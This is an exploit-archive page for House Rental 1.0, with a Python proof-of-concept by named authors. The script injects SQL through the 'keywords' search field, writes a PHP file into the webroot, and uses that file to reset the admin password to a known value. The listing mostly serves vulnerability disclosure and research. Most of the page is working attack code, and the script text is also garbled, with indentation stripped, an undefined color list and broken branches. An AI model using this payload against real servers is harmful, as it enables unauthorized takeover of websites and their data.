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House Rental 1.0 SQL Injection

House Rental 1.0 SQL Injection
Posted Nov 25, 2020
Authored by Bobby Cooke, hyd3sec

House Rental version 1.0 remote SQL injection exploit that leverages the keywords variable.

tags | exploit, remote, sql injection
SHA-256 | f3ce405357239bc159864db3af6456bd0791342c989bbfdf3d252560b427b3d3

House Rental 1.0 SQL Injection

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# Exploit Title: House Rental 1.0 - 'keywords' SQL Injection
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: 2020-08-07
# Vendor Homepage: https://projectworlds.in
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/home-rental.zip
# Version: 1.0
# Tested On: Windows 10 Pro (x64_86) + XAMPP | Python 2.7
# CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
# OWASP Top Ten 2017: A1:2017-Injection
# CVSS Base Score: 10.0 | Impact Subscore: 6.0 | Exploitability Subscore: 3.9
# CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
# Vulnerability Description:
# House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability allowing remote attackers
# to execute arbitrary code on the hosting webserver via sending a malicious POST request.
# Vulnerable Source Code:
# /config/config.php
# 11 try {
# 12 $connect = new PDO("mysql:host=".dbhost."; dbname=".dbname, dbuser, dbpass);
# 13 $connect->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
# /index.php
# 5 if(isset($_POST['search'])) {
# 7 $keywords = $_POST['keywords'];
# 11 $keyword = explode(',', $keywords);
# 12 $concats = "(";
# 13 $numItems = count($keyword);
# 15 foreach ($keyword as $key => $value) {
# 17 if(++$i === $numItems){
# 18 $concats .= "'".$value."'";
# 19 }else{
# 20 $concats .= "'".$value."',";
# 23 $concats .= ")";
# 47 $stmt = $connect->prepare("SELECT * FROM room_rental_registrations_apartment WHERE country IN $concats OR country IN $loc OR state IN $concats OR state IN $loc OR city IN $concats OR city IN $loc OR address IN $concats OR address IN $loc OR rooms IN $concats OR landmark IN $concats OR landmark IN $loc OR rent IN $concats OR deposit IN $concats");
# 48 $stmt->execute();

import requests, sys, re, json
from colorama import Fore, Back, Style

S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
err = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0]

def sig():
SIG = F[2]+" .-----.._ ,--. "+F[5]+" .__ .__________\n"
SIG += F[2]+" | .. > "+F[4]+"___"+F[2]+" | | .--. "+F[5]+" | |__ ___.__. __| _\\_____ \\ ______ ____ ____\n"
SIG += F[2]+" | |.' ,'"+F[4]+"-'"+F[2]+"* *"+F[4]+"'-."+F[2]+" |/ /__ __ "+F[5]+" | | < | |/ __ | _(__ < / ____/ __ _/ ___\\\n"
SIG += F[2]+" | <"+F[4]+"/ "+F[2]+"* * *"+F[4]+" \\ "+F[2]+"/ \\/ \\ "+F[5]+" | Y \\___ / /_/ | / \\\\___ \\\\ ___\\ \\___\n"
SIG += F[2]+" | |> ) "+F[2]+"* *"+F[4]+" / "+F[2]+"\\ \\ "+F[5]+" |___| / ____\____ |/______ /____ >\\___ \\___ >\n"
SIG += F[2]+" |____..- "+F[4]+"'-.._..-'"+F[2]+"_|\\___|._..\\___\\"+F[5]+" \\/\\/ \\/ \\/ \\/ \\/ \\/\n"
SIG += F[2]+" "+F[2]+"_______github.com/boku7_____ "+F[5]+" _______github.com/hyd3sec____\n_"+F[0]+S[0]
return SIG

def header():
head = S[3]+F[2]+' --- House Rental v1.0 | SQL Injection - Change Admin Password ---\n'+S[0]
return head

def formatHelp(STRING):
return S[3]+F[2]+STRING+S[0]

if __name__ == "__main__":
if len(sys.argv) != 2:
print(err+formatHelp("Usage:\t python %s <WEBAPP_URL>" % sys.argv[0]))
print(err+formatHelp("Example:\t python %s ''" % sys.argv[0]))
SERVER_URL = sys.argv[1]
if not re.match(r".*/$", SERVER_URL):
INDEX_URL = SERVER_URL + 'index.php'
EXECUTE_URL = SERVER_URL + 'execute.php'
LOGIN_URL = SERVER_URL + 'auth/login.php'
s = requests.Session()
get_session = s.get(INDEX_URL, verify=False)
pdata = {'keywords':'1337\') UNION SELECT all \'1,UPDATED,ADMIN,PASSWORD,TO,boku,aaaaaa,city,landmark,rent,deposit,plotnum,apartName,aptNum,rooms,floor,purpose,own,area,address,accomd,<?php require "config/config.php";$stmt=$connect->prepare("UPDATE users set password=\\\'17d8e2e8233d9a6ae428061cb2cdf226\\\' WHERE username=\\\'admin\\\'");$stmt->execute();?>,image,open,other,1,2020-08-01 14:42:11,2020-08-01 14:42:11,1\' into OUTFILE \'../../htdocs/home-rental/execute.php\' -- boku', 'location':'','search':'search'}
SQLi = s.post(url=INDEX_URL, data=pdata, verify=False)
if SQLi.status_code == 200:
print(ok+"Sent "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" POST Request to "+F[5]+S[3]+INDEX_URL+F[0]+S[0]+" with "+F[2]+S[2]+"payload"+F[0]+S[0]+":")
print(S[3]+F[2]+json.dumps(pdata, sort_keys=True, indent=4)+F[0]+S[0])
print(err+'Cannot send payload to webserver.')
print(ok+"Executing "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" payload to change "+F[2]+S[2]+"admin password"+F[0]+S[0])
EXECUTE = s.get(url=EXECUTE_URL, verify=False)
print(err+'Failed to connect to '++F[2]+S[3]+EXECUTE_URL+F[0]+S[0]+'to execute payload')
print(ok+F[2]+S[3]+"SQL Injection payload executed!"+F[0]+S[0])
print(ok+F[2]+S[3]+"Login at "+F[5]+S[3]+LOGIN_URL+F[0]+S[0]+" with creds: "+F[2]+S[2]+"admin:boku"+F[0]+S[0])
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